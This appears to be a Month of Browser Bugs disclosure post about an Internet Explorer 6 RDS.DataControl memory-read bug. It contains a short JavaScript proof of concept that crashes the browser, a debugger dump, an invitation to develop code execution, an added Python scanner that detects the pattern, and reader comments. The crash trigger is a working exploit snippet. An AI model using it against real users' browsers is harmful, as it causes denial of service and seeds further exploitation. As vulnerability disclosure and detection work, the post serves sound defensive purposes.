MoBB #8: RDS.DataControl URL
The following bug was tested on the latest version of Internet Explorer 6 on a fully patched Windows 2000 SP4 system. The RDS.DataControl object copies the URL parameter from JavaScript using the SysAllocStringLen routine in OLE32.dll. On Windows 2000, this can lead to an invalid length calculation that results in a memory read going beyond the end of the page. It appears that some form of heap corruption may be occurring before the access violation, but without a SEH pointer on the heap, this isn't useful for exploitation. If you can find a way to achieve code execution using this bug, please contact me for a prize :-)
// Instantiate the RDS.DataControl ActiveX object by its ProgID
var a = new ActiveXObject('RDS.DataControl');
// Double a string until it reaches 256 KB, assigning it to the URL property
// on every pass; the copy through SysAllocStringLen is what reads past the page
var b = "X";
while (b.length < (1024*256)) a.URL = (b+=b);
Demonstration
eax=001be00c ebx=00005a70 ecx=00000231
edx=00005a70 esi=00191000 edi=001c31b8
eip=779d927a esp=0012b1b4 ebp=7c59c147
OLEAUT32!SysAllocStringLen+0x7a:
779d927a f3a5 rep movsd ds:00191000=???????? es:001c31b8=00580058
This bug was reported to Microsoft in March of 2006.
This bug will be added to the OSVDB:
Microsoft IE RDS.DataControl SysAllocStringLen Invalid Length
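An added defender-side example, not part of the original post: a small Python scanner that flags HTML or script content instantiating this control, either through the ProgID used in the proof of concept above or through an <object classid=...> tag, and separately notes the loop-driven growth of the URL property. The ProgID comes from the post; the CLSID in the watchlist is the one registered for RDS.DataControl on stock Windows installs and is supplied from the editor's knowledge, not from the post, so confirm it against HKCR\RDS.DataControl\CLSID on your own build before relying on it. The sample pages are constructed.

```python
import re
from html.parser import HTMLParser

# Identifiers to flag. The ProgID is from the post; the CLSID is the one
# registered for RDS.DataControl on stock Windows (editor's knowledge, not from
# the post) and should be verified under HKCR\RDS.DataControl\CLSID.
WATCHLIST = {
    "rds.datacontrol": "RDS.DataControl (ProgID)",
    "bd96c556-65a3-11d0-983a-00c04fc29e36": "RDS.DataControl (CLSID)",
}

# new ActiveXObject('ProgID') / new ActiveXObject("ProgID")
ACTIVEX_RE = re.compile(
    r"""new\s+ActiveXObject\s*\(\s*(['"])([^'"]+)\1\s*\)""", re.IGNORECASE)
# classid="clsid:{GUID}" or classid="clsid:GUID"
CLSID_RE = re.compile(r"clsid:\s*\{?([0-9a-f-]{36})\}?", re.IGNORECASE)
# A while loop whose body assigns the URL property (the string-growth pattern)
URL_LOOP_RE = re.compile(r"while\s*\(.*?\)[^;]*\.URL\s*=", re.IGNORECASE | re.DOTALL)


class _Collector(HTMLParser):
    """Collect <script> bodies and <object classid=...> values from HTML."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self.classids = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
            self._buf = []
        elif tag == "object":
            for name, value in attrs:
                if name == "classid" and value:
                    self.classids.append(value)

    def handle_endtag(self, tag):
        if tag == "script":
            # Script data may arrive in chunks; join them before matching
            self.scripts.append("".join(self._buf))
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def scan_html(html):
    """Return a sorted list of findings for one page (empty list if clean)."""
    collector = _Collector()
    collector.feed(html)
    collector.close()
    findings = set()
    for classid in collector.classids:
        m = CLSID_RE.search(classid)
        if m and m.group(1).lower() in WATCHLIST:
            findings.add("object tag instantiates " + WATCHLIST[m.group(1).lower()])
    for script in collector.scripts:
        for m in ACTIVEX_RE.finditer(script):
            progid = m.group(2).strip().lower()
            if progid in WATCHLIST:
                findings.add("script instantiates " + WATCHLIST[progid])
        if URL_LOOP_RE.search(script):
            findings.add("URL property assigned inside a loop")
    return sorted(findings)


# Constructed sample pages for a local run
SAMPLE_POC = """<html><body><script>
var a = new ActiveXObject('RDS.DataControl');
var b = "X";
while (b.length < (1024*256)) a.URL = (b+=b);
</script></body></html>"""
SAMPLE_OBJECT = '<object classid="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"></object>'
SAMPLE_BENIGN = "<script>var x = new ActiveXObject('Microsoft.XMLHTTP');</script>"

if __name__ == "__main__":
    for label, page in (("poc", SAMPLE_POC), ("object", SAMPLE_OBJECT), ("benign", SAMPLE_BENIGN)):
        print(label, scan_html(page))
```

Content inspection like this is a supplement, not a substitute, for disabling the control: setting the ActiveX kill bit (Compatibility Flags value 0x400 under HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CLSID}) stops Internet Explorer from instantiating it at all, whichever ProgID or classid a page uses.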
4 Comments:
I ran this on my VISTA Beta 2 using IE 7 Beta 2 and it asked me if I wanted to run an ActiveX control. It stated in the block that it was a Microsoft item. I did not run it.
That is why I do not crash my system.
This makes me sad to see so many bugs in IE, wow!!!!! HD MOORE should give IE a break LOL.. I wish I knew what IE bugs are patched, hdm any thoughts?
If IE still has 85% of the user base, expect that percent of the MoBB bugs to target IE :-) If a patch is available, it will be noted in the bug description.
It has nothing to do with market share. Apache, which has a larger market share than IIS, has continually had fewer bugs. It's about coding errors and the company's responsibility to fix them.
It's a fact that the open source community is faster to respond to bugs (within 24 hours in most cases) than their proprietary neighbors and that they are generally (because more eyes are on the code) more bug-free.
Just accept the knocks and blame the company for being slow to respond.